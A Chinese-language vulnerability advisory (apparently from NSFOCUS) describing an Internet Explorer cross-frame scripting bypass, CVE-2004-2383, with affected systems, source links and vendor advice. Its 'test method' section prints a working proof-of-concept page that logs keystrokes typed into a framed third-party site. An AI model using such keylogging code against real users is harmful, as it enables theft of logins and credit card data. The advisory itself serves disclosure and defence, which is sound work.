安全研究
安全漏洞
Microsoft Internet Explorer跨帧脚本限制绕过漏洞
发布日期:2004-02-27
更新日期:2004-03-02
受影响系统:
Microsoft Internet Explorer 6.0SP1描述:
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
BUGTRAQ ID: 9761
CVE(CAN) ID: CVE-2004-2383
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。
问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( http://support.microsoft.com/support/kb/articles/Q167/7/96.asp ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。
攻击者可以诱骗用户连接包含恶意帧的页面来利用这个漏洞。获得敏感信息,或者受信情况下访问伪造页面。
<*来源:iDEFENSE
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107789805523342&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>
下面的击键事件只在事件通过framesets时才发生,恶意脚本会监视所有目标Frameset中的击键记录,并传送记录到任意远程指定地点。因此利用这个漏洞可获得敏感信息,如登录信息和信用卡信息。
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
浏览次数:4119
严重程度:1(网友投票)
绿盟科技给您安全的保障